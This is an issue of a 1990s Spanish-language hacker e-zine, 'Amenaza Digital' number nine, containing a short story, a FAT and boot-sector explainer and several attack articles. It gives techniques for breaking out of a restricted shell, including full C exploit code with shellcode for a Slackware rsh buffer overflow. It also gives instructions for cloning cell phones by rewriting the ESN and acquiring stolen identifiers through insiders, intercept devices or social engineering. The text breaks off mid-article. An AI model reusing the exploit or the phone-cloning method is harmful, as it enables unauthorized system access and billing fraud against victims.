You are on page 1of 22

_ _ _ __ | |(_) |_ __ / _ \| || | __|/ _ \ | __/| || | |_| __/ \___||_||_|\__|\___| RADikal ============================= InVoluCRaDos En lA lAbOR dE HAceR saBeR ============================= PrEsEnTa: -------------------

Amenaza /// / /// / ///// // / / / / /__ / / / / / / / / / / / / //// / /// / //// / / / / ///// -----------------------------AMENAZA DIGITAL NUMERO NUEVE ****************************************************************************** La informacion que aparece en esta edicion o en ediciones anteriores o modificadas es publicada meramente con fines informativos y/o educativos. Amenaza Digital no se hace responsable del uso o abuso que de ella pudiera hacerse por ningun concepto ni bajo ninguna circunstancia. ****************************************************************************** --------CONTENIDO --------INTRO... LA VISION... HACKEANDO UNA RSH (RESTRICTED SHELL)... DESCRIPCION DEL BOOT, FAT Y SECTOR... TELEFONIA CELULAR... CONTACTANDO CON MUERTOS... HACK PHF... ALEGRES EXPLOSIVOS... CORREO??? AQUI???... PALABRAS FINALES... -- INTRO -,,, __ __ (o o) /(o o)\ -----oOOo-(_)-oOOo--oOOo-(_)-oOOo---Holaaaaaa!!! mucho tiempo sin saludarnos! Un saludo decembrino de parte de todos los que trabajamos (???) aqui en TU Amenaza Digital. Por cierto que algunos miembros de este team han decido formar Elite Solutions for the People, una pequea empresa dedicada a proveer de servicios informaticos que van desde los basicos (captura de texto, scaneo, impresion), hasta los mas o menos avanzados (asesoria en linea o por email). Esto nos da mucho gusto, ya que de esta manera podemos mostrarnos en nuestra faceta de seres humanos sociales y productivos. :) Tambien Turbex nos honra con otro fragmento de La Vision, que quien sabe que vision sera, porque nos recuerda a una pelicula de aventuras, pero en fin, tratandose del Turbex todo puede pasar. En fin, ya dejemonos de tanta chorcha (que asi se dice conioooo cuando uno

hablotea...) y comencemos con la Amenaza Digital numero nueve! Adelante pues! LA VISION Por Turbex ([ERAD] / Elite RADikal) La puerta se abria cada vez mas, pero lentamente, de acuerdo a los estandares de seguridad. Blairboy y Metroman veian el fin acercarse cada vez mas, y el modesto "bip" de una de las laptops indicaba el final del proceso de Blair. Un haz de luz comenzo a aparecer. La puerta ya casi se abria en su totalidad, y las voces de los demas oficiales retumbaban en aquella celda. La puerta quedo totalmente abierta. Los oficiales se abalazaron en tropel hacia el interior de la celda, pero algo en la oscuridad los hizo retroceder. Una espeluznante aparicion los hizo gritar de miedo, los hizo estremecerse hasta el grado de perder el sentido, en el caso de algunos oficiales. Una serie de rafagas de aire azotaron a los oficiales, poniendolos fuera de combate. Era evidente que fuerzas paranormales actuaban en aquella habitacion. El ataque ceso y una voz femenina pregunto: -Buscaban una bruja? Blariboy y Metroman se miraron a los ojos, estupefactos, para despues soltar la carcajada y vocear en coro: -Maggie Witch!!! -Como estan? Gusto de verles!!! -Contesto Maggie despues de recobrar su forma original. -Un poco sorprendidos... -respondio Blair. -Y te vas a soprender mas, bro!!! -Dijo una voz desde fuera. -Mira Metro, es Joinj!!! -Blair vociferaba sin control. Metroman se asomo al pasillo, solo para seguir exclamando: -Y ahi viene Pergonal! y, y Minotauro! y Adam Foe! Sidney2000 esta aqui! mira! por alla esta I Satanas!!! que barbaro! todos han salido de sus celdas!!! Cuando todos estuvieron reunidos, improvisaron cuidadosamente una de las llamadas "terminales etereas", solo para poder volver donde Neon Ghost Sensei. SET PORTAL ACTIVE SETTINGS ON HISTORY LAST SET AUTOFIND ON MASSIVE HUMAN TRANSFER ON -Y un pequeo "enter". -Dijo Pergonal, un aparente introvertido. Al presionar la tecla, empezo a formarse aquella misteriosa presencia en el aire, que aquel equipo diseo con tanto esfuerzo durantes sus epocas de libertad. La misma que estaban a punto de obtener de nueva cuenta. Aquel extrao fenomeno que daba la apariencia de aire liquido empezo a formarse. -Vamos, vamos, que el tiempo es oro! -Dijo Minotauro.

-Adelante!!! -Exclamaron al mismo tiempo DJ Mota y MC Herb, quienes compartian el mismo gusto por los ritmos y el rap, un antigua forma de musica. Uno a uno fueron cruzando aquella puerta que parecia no llevar a ninguna parte, pero que finalmente los reencontraria con el eterno mentor. Poco despues se encontraron en una habitacion deslumbrantemente blanca, y cuando sus ojos se adaptaron a aquella resplandescencia descubrieron a el gran mentor como siempre, reclinado en un sillon y saboreando un cigarrillo. -Neon Ghost Sensei! -Dijeron DJ Mota y MC Herb. -El mismo... -Pense que estarias mas viejo... -Dijo Maggie Witch. -Ya ven que no... -Es bueno verte de nuevo, Maestro. -Dijo Blairboy. -Gracias, alumno primero. Joinj se regocijaba comtenplando aquel recinto. Nada habia cambiado, sin duda alguna. Todo permanecia inmaculadamente blanco, deslumbrante. Sus equipos habian sido preservados por aos como si fueran a usarse al dia siguiente. Todo respectivamente ordenado, registrado y etiquetado. -Maestro... -Pregunto Joinj al fin. -Dime. -Como supo el momento en que podriamos escapar??? Neon Ghost Sensei medito unos segundos, que hicieron sospechar a todo el equipo que lo que el maestro tenia que decir le ocuparia seguramente mas de dos pa labras. -No lo dire ahora. Mas adelante sera mejor. Joinj se rasco la cabeza. Maggie Witch y Metroman afinaban los ultimos detalles para poner en funcionamiento el sistema central, que rehabilitaria sus equipos individuales. De repente se oyo un "click", y luego aplausos. El sistema central habia sido remplazado. Como si se hubiese tratado de una competencia, todos se abalanzaron desesperadamente sobre sus equipos. Hubo quien exagero y hasta beso el monitor de su computadora. Al terminar de arrancar los sistemas, todos se sorprendieron al contemplar sus monitores. Hubo silencio, hasta que al fin Adam Foe se atrevio a preguntar: -Estuvimos prisioneros catorce aos??? HACKEANDO UNA RSH (RESTRICTED SHELL) Por Nobody Muchas veces cuando entramos en un shell ajeno, o sea en una cuenta de un servidor, nos encontramos con el famoso RSH 'restricted shell', que es un shell restringido, el cual es establecido por el administrador del sistema, para anular la ejecucion de comandos que pueden comprometer la seguridad del sistema, o incluso anulan el comando 'cd' para que no podemos salir de nuestro directorio de trabajo.

Basicamente, lo que haremos aqui es explicar diferentes tecnicas, para poder saltarnos el rsh :), que conste que puede que estos metodos no funcionen, por lo que nos tendremos que espabilar y buscar nuevos metodos, solo teneis que poner a trabajar esa 'materia gris' que teneis por cabeza. Ahora lo mejor sera describir las restricciones que aplica el RSH, y como funciona. Estas restricciones son : - Los usuarios no pueden moverse de su directorio propio, ya que la orden 'cd' esta descapacitada. - Los usuarios no puden cambiar el valor de la variable PATH, de modo que solo pueden ejecutar ordenes en el PATH que les proporciona el administrador del sistema. - Los usuarios no pueden cambiar el valor de la variable SHELL. - Los usuarios no pueden ejecutar ordenes en directorios a los que aparezcan en su PATH, ya que no pueden utilizar un nombre de orden que contegan una barra diagonal '/'. - Los usuarios no pueden redirigir la salida usando '>' o '>>'. - Los usuarios no pueden utilizar ordenes exec. Como podemos ver el RSH, nos deja bastante limitados en el manejo del sistema. Estas restricciones se aplican cuando se ha ejecutado el .profile del usuario. El administrador debe preparar el fichero .profile, cambiando el propietario del fichero a root y ademas debe cambiar los permisos en el fichero para que nadie escriba en el mismo. El administrador define el PATH del usuario en el .profile de modo que el usuario solo pueda ejecutar comandos en su directorio especifico, generalmente se suele denominar /usr/rbin. En realidad el RSH suele ser el shell SH pero invocado mediante el parametro '-r'. La seguridad del RSH esta muy limitada ya que un hacker puede quebrarlo y obtener un shell sin rectricciones, pero se suele usar bastante ya que nos librara de muchos que juegan a hackers ;-) Bueno, ya basta de teoria y empezemos con el juego. Como sabemos en cada directorio de los usuarios hay unos determinados ficheros, que sirven para configuraciones y a que podemos acceder, etc. Por ejemplo para ver estos ficheros que son ocultos ejecutamos en el prompt : $ ls -al total 14 drwxr-xr-x drwxr-xr-x -rw-r--r--rw-r--r-T -rw-r--r--rw-r--r--rw-r--r--rw-rw-r-$

2 6 1 1 1 1 1 1

500 root 500 root 500 500 500 500

nobo root nobo root nobo nobo nobo nobo

1024 1024 3768 143 24 220 124 3336

May May Nov May Jul Aug Aug Oct

7 7 7 7 14 23 23 24

20:18 16:05 1997 14:52 1994 1995 1995 1997

. .. .Xdefaults .bash_history .bash_logout .bash_profile .bashrc .screenrc

Bueno, aqui tenemos un ejemplo de los ficheros ocultos que suelen tener los usuarios en sus directorios, los ficheros que nos interesan para este caso seran el .profile, aqui como .bash_profile y el .login que aqui no esta presente, que suele estar en algunos sistemas.

Que podamos saltarnos el RSH se debe al descuido de los administradores, ya que esta considerado peligroso dejar el .profile en el directorio del usuario, debido a que muchas veces podemos sustituir el .profile por uno que creemos y subirlo usando el FTP a la cuenta. Lo que tenemos que hacer es crear un .profile en nuestra maquina, despues lo subimos por FTP a la cuenta que nos interesa y por ultimo via Telnet conectamos a la cuenta y ya estaremos usando el .profile que hayamos insertado :). Esto se debe a que aunque el .profile sea de propiedad root se encuentra en el directorio del usuario, por esta razon el usuario o en nuestro caso, nosotros, podemos escribir en el .profile. Para ver que shell tenemos, basta que mirremos el etc/passwd que es un fichero de lectura publica, aunque este en shadow podemos ver la ubicacion de los directorios de los usuarios y los shell's asignados, esto lo haremos de la siguiente manera: $ vi /etc/passwd Facil!! ;-) Pues ya a estas alturas ya debemos haver anulado el RSH, pero para aquellos que tengan un administrador mas avispado, que utilizen el siguiente programa, el cual desborda la memoria. ------------ Codigo Fuente --------------------------------------------------/* SLACKWARE RSH Buffer OverFlow -- (c) shit-head (w0nky@usa.net) 1997 Created: 8/15/97 Give thanks to Solar Designer for his su overflow, this is based on that peice of work. This is for educational purposes only, in no way am I responsible for what you do with this. This should be used by sys admins, or people who have permission of the admin to run it to see if this hole can exist on their system. If you use it for the wrong reasons then I say *tisk* on you. I will not be held responsible for your actions. This could be done with a generic overflow program, but just running this is easier. USAGE OF THIS DOES NOT GIVE YOU TECH SUPPORT SO DON'T MESSAGE ANYBODY ON IRC ABOUT THIS. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> char *shellcode = "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04" "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb" "\xcd\x80/" "/bin/sh" "0"; char *get_sp() { asm("movl %esp,%eax"); } #define bufsize 2048

char buffer[bufsize]; main() { int i; for (i = 0; i < bufsize - 4; i += 4) *(char **)&buffer[i] = get_sp() - 3072; memset(buffer, 0x90, 512); memcpy(&buffer[512], shellcode, strlen(shellcode)); buffer[bufsize - 1] = 0; setenv("NLSPATH", buffer, 1); system("clear"); printf("______________________________________________________________\n"); printf("| RSH Overflow -- (c) shit-head 1997\n"); printf("| Give props to Solar Designer for his su overflow, this is based on that.\n"); printf("|\n"); printf("| Peep's to: suid, knowy, thugzsta, you all be reet.\n"); printf("|\n"); printf("| *NOTE* I'm not responsible if you abuse this. Run only w/ premission\n"); printf("| Sending Overflow.... Done.\n"); printf("--------------------------------------------------------------\n"); execl("/usr/bin/rsh", "/usr/bin/rsh", NULL); } ------------ FIN ------------------------------------------------------------Bueno, gente esto es todo por hoy y espero que os haya gustado el tema. Logicamente el RSH tiene mas truco pero no tiene gracia si se los digo todo ;-) Y desde aqui saludar a toda la raza de #seguridad_informatica!!!!! DESCRIPCION DEL BOOT, FAT Y SECTOR (boot sector, FAT y sector de directorio) Por Zarpex En esta nota, pongo a disposicion de uds. todos los datos necesarios que fui aprendiendo y que hay que conocer sobre ... (bueno, habran leido el titulo, no? :) ) cualquier duda, dejen un msg.......NO! ARREGLENSELA! ;) a ver ... quien sabe como se formatea un disco o diskette? ALUMNO ULTRA LAMMER DEL CETEC : - YO!! format x: donde x es la unidad Muy bien, pero si a este digamos, sujeto, se le preguntara que es el boot sector, seguramente se quedaria callado....obviamente no esperabamos mas de un tipo que paga $200 para aprender winfuck 98, word y demas sandeces (!?). Pero, cuantos de uds saben que es lo que permite a un diskette ser reconocido como valido por el dos para poder utilizarlo?? Bueno, todos mas o menos saben como esta dividido logicamente un disco o diskette, no? cuando se formatea, el disco queda dividido en cuatro areas bien diferenciadas: NOTA: esto del boot sector es MUY-DEMASIADO-EXTRA-CONOCIDISIMO, y lo pueden ---- saltear si quieren, ya que seguramente no les aportara nada nuevo. asi que a menos que recien empiezen o sean tan despistados como para nunca haber visto una descripcion del boot o ni siquiera haber usado el diskedit, sugiero que pasen al tema de la fat. Pero en fin, ahi va ... 1.- el boot sector, que contiene los datos necesarios para que el dos pueda

acceder al disco duro y aparte tiene un pequeno programa encargado de cargar en memoria el io.sys, msdos.sys y transferirles el control. (o no. si no los encuentra muestra el mensaje para que se ponga un diskette con archivos de sistema) todo esto se encuentra en el sector logico 0. su archiconocida estructura es la siguiente: (siempre hay alguno que no la tiene...) en los primeros 62 bytes esta la BPB, (bios parameter block) que contiene varios datos importantes sobre el disco: EIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII Offset bytes descripcion IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 0 3 estos 3 bytes no son datos en realidad, sino que es un jmp al final de la tabla y al principio del codigo ejecutable IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 3 8 OEM ID IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 0Bh 2 bytes per sector IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 0Dh 1 sectors per cluster IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 0Eh 2 reserved sectors at beggining IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 10h 1 FAT copies IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 11h 2 root directory entries IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 13h 2 total sectors on disk IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 15h 1 media descriptor byte IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 16h 2 sectors per FAT IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 18h 2 sectors per track IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 1Ah 2 sides IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 1Ch 4 special hidden sectors IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 20h 4 big total number of sectors IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 24h 2 physical drive number IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 26h 1 extended boot record signature IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 27h 4 volume serial number IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 2Bh 11d volume laberl IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 36h 8 file system ID IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII1/4 como broche final, en el offset 1FEh (al final del boot sector) esta la marca 55AAh que indican un boot valido. ahora, en el master boot record (tabla de particiones) hay otra tabla de datos (junto a su correspondiente codigo ejecutable que lo interpreta)

ubicada en los ultimos 66 bytes del sector y comienza en el offset 1BEh. tambien en el offset 1FEh esta los bytes 55AAh. por ejemplo: EIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII Offset bytes descripcion IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 1BEh 1 boot IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 1BFh 1 side IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 1C0h 1 sector IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 1C1h 1 cylinder IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 1C2h 1 system IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 1C3h 1 side IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 1C4h 1 sector IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 1C5h 1 cylinder IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 1C6h 4 relative sectors IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 1CAh 4 number of sectors IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII1/4 2.- despues de este programita, vienen las dos copias de la FAT. esta contiene todos los clusters asociados a cada archivo que se encuentra en el disco. por ejemplo, el archivo pepe.txt que comienza en tal cluster, para que el dos pueda accederlo, debe seguir la cadena de clusters por la que esta compuesto. (un cluster es la minima unidad que se reserva para un archivo) bueno, sabiendo lo mas basico, vamos a leer la FAT. para estar bien seguro de donde comienza la FAT, hay que leer el boot sector (supongo que conoceran la int 25h, no?) y leer el offset 0Eh para saber cuantos sectores de boot y reservados hay antes del comienzo de la FAT. veamos un ejemplo de como esta dispuesto un archivo en la FAT: primero, tenemos una entrada de directorio como la siguiente (en el punto 3 se describe a full como esta compuesta una de estas): EIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII programexea hhdd08size IIIIIIIIIIIIIIIIIIIIIII1/4 hora dia tamano del nombre del IIIIII1/4 (2) (2) archivo (4) archivo (7) reservado (10) extension (3) IIIIII1/4 cluster atributo inicial (1) (2) entre parentesis esta la cantidad de bytes usados

lo que nos interesa a nosotros (para leer la fat) es el offset nro 28 de una entrada de directorio que contiene el cluster inicial del archivo. en este caso, program.exe tiene su primer byte en el cluster nro 8 0 1 2 3 4 5 6 7 8 9 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 EIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII IDff030405ff0000090a0b15000000000000000000161719f7 IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII1/4 19 1a 1b 1c 1d 1e 1f EIIIIIIIIIIIIII 1a1bff00000000 IIIIIIIIIIIIII1/4 eso de ahi arriba es un ejemplo de una porcion de la fat. entonces, si queremos ubicar a program.exe, vemos en que cluster comienza (en este caso 8) y leemos. por ejemplo, vamos a la entrada nro 8 y vemos que hay un 9, quiere decir que se sigue en el cluster nro 9. entonces al final, la cadena quedaria asi: 8,9,0a,0b,15,16,17,19,1a,1b. cada entrada marca la siguiente (o el final con un codigo especial) el cluster nro 18 esta marcado como "bad" y no interviene en la cadena. los clusters 6,7,0c-14 y 1c-1f estan vacios y se los puede utilizar para grabar informacion otra cadena comienza en el cluster 2 y termina en el 5 la fat puede venir (asi, de fabrica, nomas) en entradas de 12-bit o en 16-bit. las de 12-bit van para los diskettes, debido a que a pesar de ser eficientes, no sirven para discos grandes. por eso en discos duros se usa fat de 16 bit. las fat de 16 bit vienen desde el dos 3.0 por la necesidad de poder manejar los discos "nuevos" de 20mb. (Nota de la redaccion: ???) bueno, ahora, para leer los datos de la fat (para seguir una cadena, por ej.): primero, hay que leer la fat en memoria y obtener el cluster donde comienza el archivo (como ya vimos, de una entrada del directorio). despues, para fat de 12-bit: * multiplicar el nro. de cluster por 3 * al resultado, se lo divide por 2 * ese resultado, es un offset, en el cual hay que leer un word. (siempre ese offset es dentro de la fat, ok?) * si el cluster es par, enmascarar el resultado con 0fffh (guardar los 12 bits bajos) si el cluster es impar, hay que rotar a la derecha (shr) 4 bits (guardar los 12 bits altos) * y al fin, el resultado es el proximo cluster de la cadena (0fffh termina). para la fat de 16-bit es una boludez, sencillamente cada entrada contiene un offset de 16 bits hacia el proximo cluster (0fffh termina) ahora, la fat en su primer byte, tiene un byte denominado media descriptor o fat id byte. los proximos 5 bytes (en fat de 12 bit) o 7 bytes (en fat de 16 bit) son igual a 0ffh. el resto de la fat esta compuesto por "celdas" de 12 o 16 bit que representan un cluster del disco. cada una de estas puede contener uno de los siguientes valores: (0)000h..................cluster disponible (f)ff0h hasta (f)ff7h....cluster reservado (f)ff7h..................cluster danado (f)ff8h hasta (f)fffh....fin de una cadena (0)002h hasta (f)fefh....el numero del proximo cluster en una cadena

puf! que cansancio.....espero que sirva para algo...bueno, continuemos: una vez que tenemos un archivo, y tenemos su cluster inicial y todo, debemos ubicar ese file en disco, o sea, debemos ubicar que sector alberga a ese file. bueno, para la conversion de cluster a sector, se utilizan las siguientes formulas: root_dir_sectors fat_sectors data_start int 25h/26h sector r) = = = = sector_bytes / (root_dir_entries * 32) fat_count * sectors_per_fat reserved_sectors + fat_sectors + root_dir_sectors data_start + ((any_cluster_number - 2) * sectors_per_cluste

donde las variables: sector_bytes root_dir_entries sectors_per_fat reserved_sectors fat_count sectors_per_cluster

se pueden obtener del bpb explicado mas arriba. el numero de sector obtenido se puede pasar en dx de int 25h/26h para acceder al archivo. o, segun ralph brown, esta la funcion 32h de int 21h que predica asi: ;---------------------------------------------------------------------------INT 21 - Internal - GET DRIVE PARAMETER BLOCK AH = 32h DL = drive number 0 = default, 1 = A, etc. Return: AL = 0FFh if invalid drive number, else DS:BX = address of drive parameter block. STRUCTURE OF DOS DRIVE PARAMETER BLOCK: DPBLOCK DISK_OFFSET UNIT_OFFSET SECTOR_SIZE MAX_CLUSTER LOG2_SECTORS RESERVED FAT_COUNT ROOT_COUNT DATA_START MAX_NUMBER FAT_SECTORS ROOT_START DEVICE_ADDR DESCRIPTOR VALID_BYTE NEXT_BLOCK ; STRUCT DB DB DW DB DB DW DB DW DW DW DB DW DD DB DB DD ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ;OFFSET ; 0. drive number (0 = A, etc.) ; 1. unit number within device driver ; 2. number of bytes per sector ; 4. largest sector number in cluster ; add one for number of sectors/cluster ; 5. log base two of the cluster size ; 6. number of reserved (boot) sectors ; 8. number of copies of the FAT ; 9. number of root directory entries ; 11. first data sector on medium ; 13. largest possible cluster number ; subtract one for number of data clusters ; 15. number of sectors in one FAT copy ; 16. first sector of root directory ; 18. address of device driver for this drive ; 22. media descriptor byte for medium ; 23. 0FFh indicates block must be rebuilt ; 24. address of next device block in list

FROM THIS POINT ON, DOS 3 DIFFERS FROM 2: IF DW DOS2 ? ; 28. starting cluster of current directory ; zero indicates the root directory

DIR_START

PATH_NAME

64 DUP (?) ; 30. ASCIIZ current directory path string ELSE DOS3 ; on my XT, this was always: DW 0 DW 0FFFFh ENDIF DPBLOCK ENDS ;---------------------------------------------------------------------------lo malo de esto es que es indocumentado (creo) asi que no se hasta cuando servira. pero igual ahorra trabajo. bueno, eso es todo sobre la fat... 3.- y la ultima parte es el directorio raiz. aca estan los nombres y mucha otra informacion sobre cada uno de los archivos y directorios ubicados en el mismo. en realidad el directorio raiz y todos los subdirectorios, poseen las llamadas entradas de directorio que es lo que detalla esta tabla: EIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII offset nro. bytes descripcion IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 0 8 nombre del archivo ena ASCII el primer byte puede contener esto: 00h -> entrada sin archivo E5h -> archivo borrado 2Eh -> subdirectorio cualquier otro valor es el nombre del archivo. IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 8 3 extension del archivo IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 11 1 atributo del archivo: 01h -> solo lectura 02h -> oculto 04h -> sistema 08h -> etiqueta 10h -> subdirectorio 20h -> modificado despues del ultimo backup* IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 12 10 reservado IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 22 2 hora del archivo IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 24 2 fecha del archivo IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 26 2 cluster inicial IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII 28 4 tamano del archivo IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII1/4 * esto es seteado por backup y xcopy para saber que archivos fueron backupeados. 4.- bueno, no jodan. es obvio, aca empiezan los datos en si.

DB

en fin, espero que les haya sido util. asi por lo menos saben que carajo estan haciendo cuando escriben copy o abren un archivo o lo ejecutan. creo que esto es "la salsa" de todo esto y merece darse a conocer....snif! saludos............zarpex TELEFONIA CELULAR por Horus Bueno,bueno, aca nos encontramos en este file con un poco de informacion sobre lo que es la telefonia celular,(Que ser eso?).Bueno, veamos un poco los manuales que nos entregan Telcel o Portatel (eso aqui en el sureste, ya que no hay que olvidar que en el centro y norte de la Republica Mexicana hay otras compaias, como Iusacell, Pegaso, Unefon, etc.). Que es? "La telefonia personal es un servicio que le da la posibilidad de estar permanentemente comunicado a traves de un numero telefonico tan personal como su numero de identidad" (Extraido de un manual de Portatel) Como funciona? "Un sistema de telefonia celular funciona mediante el enlace de un grupo de estaciones de radio que cubren celdas o celulas, las cuales al superponerse y complementarse entre si, permiten establecer comunicaciones de optima calidad utilizando telefonos moviles desde dentro del area de cobertura hacia cualquier lugar del pais y del mundo" (Extraido del manual de Telcel, uno de cada uno asi no se pelean) Emulacion de celulares Bueno, eso para que entiendan un poco mas de que se trata, ahora, para poder hablar gratis de un telefono movil, es otra cosa,esto si que no aparece en el manual, asi que nos resta investigar, veamos un poco, ah!, si, aca esta la solucion(Funcionara?). Cuando realizamos una llamada por medio de un telefono celular este se comunica con un computador y alli el computador recibe el numero de fono, mas el numero de serie electronico del movil, o sea los datos que estan en la NAM de nuestro telefono y el ESN. En la NAM se encuentran los datos referentes al numero de Telefono, numero de canal, y otros, serian los datos de configuracion del equipo, y se puede entrar con determinadas conbinaciones de teclas que dependen del aparato. El ESN, o numero electronico de serie es un numero que se puede averiguar sea mediante el menu del equipo, o por medio de la NAM, o de otra manera, pero es un numero averiguable, pero no es cambiable, porque esta escrito en la ROM del aparato, en el chip. Ahora para poder usar el telefono necesitamos emular un equipo que este en uso actualmente, para eso necesitamos entrar a la NAM y ponerle un numero que este en uso en este momento y cambiar el numero de ESN para que coincida con el del equipo que emulamos . Como leimos mas arriba, entrar a la NAM no es tanto lio, pero cambiar el ESN, parece no ser posible, pero no es asi.Si el chip no acepta cambiar el ESN.Buscamos un chip que si pueda, asi que conseguimos un EPROM chip y listo, sacamos el chip de dentro del fono e instalamos este que compramos, les comento que el precio de este chip puede rondar los $ 200 mas o menos.Ahora si le cambiaremos el numero de ESN y hablemos lo que queramos ya que el numero puesto es el que va a abonar la factura. Y como consigo un ESN?

Bueno para esto hay muchas maneras: 1)Trabajar en la parte tecnica de una de las empresas celulares del lugar. 2)Comprarle los datos a algun tecnico que trabaje alli que venda los datos, siempre hay alguno. 3)Comprar un capturador de pares, que lo que hace es capturar de una llamada los datos que el celular envia al commutador para ser habilitada la llamada, el precio es de $550 creo. 4)Utilizar un poco de lo que se denomina ingenieria social, referente a esto, solo debemos ir a la casa de un conocido que tenga celular y decirle "Me lo permites? es que tengo que hacer una llamada urgente"(se supone que estan en un lugar donde un fono de la red no esta tan cerca) o "A verlo?", sino, cuando alguien toca el timbre y dice ser vendedor de celulares, o en un stand de venta, o en un agente oficial, en fin, hay un monton de posibilidades. Bueno lo que haremos es tener en la mano el aparato, obviamente que debemos conocer las funciones de acceder al menu para poner datos en 